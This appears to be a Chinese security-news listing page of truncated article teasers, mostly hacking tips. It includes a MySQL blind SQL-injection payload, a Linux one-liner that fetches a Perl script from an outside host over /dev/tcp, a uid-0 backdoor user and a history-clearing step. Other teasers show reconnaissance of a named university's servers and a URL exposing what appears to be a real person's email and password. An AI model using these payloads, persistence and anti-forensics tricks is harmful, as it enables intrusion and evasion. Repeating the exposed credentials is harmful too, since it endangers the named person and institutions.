Ceragon FiberAir IP-10硬编码凭证安全绕过漏洞CNVD-ID CNVD-2015-00446 发布时间 2015-01-21 危害级别 高 (AV:N/AC:L/Au:N/C...
2016-03-28 /
1263 次浏览 /
业界新闻
Windows 添加管理员用户通用版本ShellcodeTitle: Add Admin User Shellcode (194 bytes) - Any Windows VersionRelease date: 21/06/2014Author: Giuseppe D''Amore (http://it.linkedin.com/pu...
2016-03-28 /
1243 次浏览 /
业界新闻
Two Pilots Exif Pilot缓冲区溢出漏洞CNVD-ID CNVD-2015-00732 发布时间 2015-01-29 危害级别 高 (AV:N/AC:L/Au:N/C:P/I:...
2016-03-28 /
1023 次浏览 /
业界新闻
接口的引入式攻击设想对于逻辑参数过滤不严可进行接口的引入攻击那么这个原理基于认证基础的.\ .\ ,可测试XSS的相关漏洞,也是相对的原理那么接口的漏洞,一般就与认证有关,就是认证当前用户,以及认证当前的状态等等一个设想的例子,存在逻辑漏洞的页面: 这里就好比www.xxx.com/inc/reset?id=1其中的reset是那么提交会超时。那么接口漏洞还有一点接收用户输入的判断,以便存放于cookie页面的状态那么相关代码如:简单的判断而已在字符串Str接收的参数,可用于...
2016-03-28 /
1085 次浏览 /
网络安全
一台美国服务器 ...
2016-03-28 /
1369 次浏览 /
网络安全
mysql盲注常用语句 http://www.2cto.com
/tmd.php?id=352&wsid=1/**/and/**/(1,1)%3E(select/**/count(*),concat((select/**/@@version/**/),0x3a,floor(rand()*2))/**/x/**/from/**/(select/**/1/**/union/**/select/**/2)/**/a/**/group/**/by/**/x/*...
2016-03-28 /
1066 次浏览 /
网络安全
友情目标:四川师范大学文理学院未深入.简单玩玩===================================、规则:静态。。 jsp二级域名下有很多动态~~125.71.200.234http://125.71.200.244/ConfigWeb%5CIndex.aspxGUID 应包含带 4 个短划线的 32 位数(xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx)。 过滤了先分析下,不用急着C段http://zfx.scnucas.com/...
2016-03-28 /
2193 次浏览 /
网络安全
Linux渗透爱好者的小技巧1.无wget nc等下载工具时下载文件exec 5<>/dev/tcp/yese.yi.org/80 &&echo -e "GET /c.pl HTTP/1.0\n" >&5 && cat<&5 > c.pl2.Linux添加uid为0的用户useradd -o -u 0 cnbird3.bash去掉history记录export HISTSIZE=...
2016-03-28 /
1187 次浏览 /
网络安全
其实这样也可以钓鱼的...
2016-03-28 /
1087 次浏览 /
网络安全
GET传送漏洞案例分析(CCTV为例)GET真的安全吗?原理你要在硕大的CCTV去找1个传送漏洞貌似很难不过我们就来想下我们就来爬下::/cntv:passwd爬到了一位:http://jishi.cntv.cn/program/gugong100/01/index.shtml?usrid2011=a61911%40gmail.com&passwd_view=%C3%DC%B4a&passwd2011=a22561081给大家讲下原理,http://jishi...
2016-03-28 /
1127 次浏览 /
网络安全
